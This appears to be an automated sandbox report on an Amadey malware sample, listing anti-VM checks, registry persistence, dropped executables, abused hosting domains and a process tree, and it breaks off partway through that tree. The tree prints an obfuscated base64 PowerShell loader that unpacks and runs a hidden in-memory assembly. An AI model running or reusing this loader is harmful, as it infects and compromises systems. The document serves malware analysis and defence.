amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe

Downloads MZ/PE file

Sets file execution options in registry 2 TTPs 22 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_executeoracle.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masscan.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe\PerfOptions	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_loader.exe\PerfOptions	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$77_oracle.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe	$77_loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nlbrute.exe\PerfOptions\CpuPriorityClass = "3"	$77_loader.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe

Executes dropped EXE 9 IoCs

pid	Process
3248	djdjdje1939_crypted_EASY.exe
4500	bd2.exe
4488	amert.exe
4188	well.exe
4196	trust12344.exe
3500	fund.exe
3364	syncUpd.exe
5100	TrumTrum.exe
220	$77_loader.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine	amert.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000800000001af0d-6787.dat	themida

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000001ac8f-291.dat	upx
behavioral2/memory/5100-293-0x00000000010A0000-0x0000000001F03000-memory.dmp	upx
behavioral2/memory/5100-297-0x00000000010A0000-0x0000000001F03000-memory.dmp	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.89.198.214

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 50 IoCs

Web Service

T1102

flow	ioc
535	raw.githubusercontent.com
231	raw.githubusercontent.com
386	raw.githubusercontent.com
522	raw.githubusercontent.com
523	raw.githubusercontent.com
617	raw.githubusercontent.com
229	raw.githubusercontent.com
387	raw.githubusercontent.com
250	pastebin.com
233	raw.githubusercontent.com
236	raw.githubusercontent.com
333	raw.githubusercontent.com
222	raw.githubusercontent.com
335	raw.githubusercontent.com
394	raw.githubusercontent.com
451	raw.githubusercontent.com
75	bitbucket.org
76	bitbucket.org
623	raw.githubusercontent.com
611	raw.githubusercontent.com
388	raw.githubusercontent.com
223	raw.githubusercontent.com
517	bitbucket.org
247	pastebin.com
457	raw.githubusercontent.com
456	raw.githubusercontent.com
458	raw.githubusercontent.com
173	raw.githubusercontent.com
311	raw.githubusercontent.com
530	raw.githubusercontent.com
1019	raw.githubusercontent.com
516	bitbucket.org
795	pastebin.com
452	raw.githubusercontent.com
532	raw.githubusercontent.com
797	pastebin.com
308	raw.githubusercontent.com
310	raw.githubusercontent.com
227	raw.githubusercontent.com
330	raw.githubusercontent.com
639	raw.githubusercontent.com
453	raw.githubusercontent.com
219	raw.githubusercontent.com
1040	bitbucket.org
1047	bitbucket.org
239	raw.githubusercontent.com
332	raw.githubusercontent.com
309	raw.githubusercontent.com
172	raw.githubusercontent.com
221	raw.githubusercontent.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
225	whoer.net
228	whoer.net
363	api.myip.com
366	api.myip.com
367	ipinfo.io
368	ipinfo.io

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000700000001ac6e-44.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4488	amert.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1144 set thread context of 4992	1144	powershell.exe	101

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorgu.job	amert.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2068	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
6076	4992	WerFault.exe	101
5312	6524	WerFault.exe	201
6900	5496	WerFault.exe	231

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	syncUpd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	syncUpd.exe

Creates scheduled task(s) 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4624	schtasks.exe
5032	schtasks.exe
8144	schtasks.exe
5504	schtasks.exe
7288	schtasks.exe
4272	schtasks.exe
876	schtasks.exe
2796	schtasks.exe
2376	schtasks.exe
1128	schtasks.exe
8952	schtasks.exe
2692	schtasks.exe
2824	schtasks.exe
6008	schtasks.exe
4980	schtasks.exe
6692	schtasks.exe
9052	schtasks.exe
2220	schtasks.exe
4536	schtasks.exe
4072	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6724	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
3852	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
5140	NETSTAT.EXE
5428	NETSTAT.EXE
5504	NETSTAT.EXE
1084	NETSTAT.EXE
9040	NETSTAT.EXE
9076	NETSTAT.EXE

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133571322839354966"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings	fund.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
7576	PING.EXE
4980	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
4488	amert.exe
4488	amert.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
4284	chrome.exe
4284	chrome.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe
3364	syncUpd.exe
3364	syncUpd.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe
220	$77_loader.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

description	pid	Process
Token: SeDebugPrivilege	4424	FUCKER.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	4196	trust12344.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe
Token: SeDebugPrivilege	220	$77_loader.exe
Token: SeShutdownPrivilege	4284	chrome.exe
Token: SeCreatePagefilePrivilege	4284	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4188	well.exe
4188	well.exe
4188	well.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4188	well.exe
4284	chrome.exe
4188	well.exe
4188	well.exe
4188	well.exe
4284	chrome.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe

Suspicious use of SendNotifyMessage 62 IoCs

pid	Process
4188	well.exe
4188	well.exe
4188	well.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4284	chrome.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe
4188	well.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4424 wrote to memory of 3248	4424	FUCKER.exe	74
PID 4424 wrote to memory of 3248	4424	FUCKER.exe	74
PID 4424 wrote to memory of 3248	4424	FUCKER.exe	74
PID 4424 wrote to memory of 4500	4424	FUCKER.exe	76
PID 4424 wrote to memory of 4500	4424	FUCKER.exe	76
PID 4424 wrote to memory of 4500	4424	FUCKER.exe	76
PID 4424 wrote to memory of 4488	4424	FUCKER.exe	77
PID 4424 wrote to memory of 4488	4424	FUCKER.exe	77
PID 4424 wrote to memory of 4488	4424	FUCKER.exe	77
PID 4500 wrote to memory of 1648	4500	bd2.exe	78
PID 4500 wrote to memory of 1648	4500	bd2.exe	78
PID 4500 wrote to memory of 1648	4500	bd2.exe	78
PID 4424 wrote to memory of 4188	4424	FUCKER.exe	79
PID 4424 wrote to memory of 4188	4424	FUCKER.exe	79
PID 4424 wrote to memory of 4188	4424	FUCKER.exe	79
PID 1648 wrote to memory of 3496	1648	wscript.exe	80
PID 1648 wrote to memory of 3496	1648	wscript.exe	80
PID 1648 wrote to memory of 3496	1648	wscript.exe	80
PID 4188 wrote to memory of 4284	4188	well.exe	82
PID 4188 wrote to memory of 4284	4188	well.exe	82
PID 3496 wrote to memory of 5100	3496	cmd.exe	84
PID 3496 wrote to memory of 5100	3496	cmd.exe	84
PID 3496 wrote to memory of 5100	3496	cmd.exe	84
PID 4284 wrote to memory of 3976	4284	chrome.exe	85
PID 4284 wrote to memory of 3976	4284	chrome.exe	85
PID 4424 wrote to memory of 4196	4424	FUCKER.exe	86
PID 4424 wrote to memory of 4196	4424	FUCKER.exe	86
PID 4424 wrote to memory of 4196	4424	FUCKER.exe	86
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89
PID 4284 wrote to memory of 5116	4284	chrome.exe	89

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424
- C:\Users\Admin\AppData\Local\Temp\Files\djdjdje1939_crypted_EASY.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\djdjdje1939_crypted_EASY.exe"
  2⤵
  - Executes dropped EXE
  PID:3248
- C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4500
- - C:\Windows\SysWOW64\wscript.exe
    "wscript.exe" "C:\Users\Admin\start.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3496
    - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5100
    - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:872
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 1680
        7⤵
        Program crash
        
        PID:6076
- C:\Users\Admin\AppData\Local\Temp\Files\amert.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\amert.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4488
- C:\Users\Admin\AppData\Local\Temp\Files\well.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\well.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4188
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
    3⤵
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4284
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
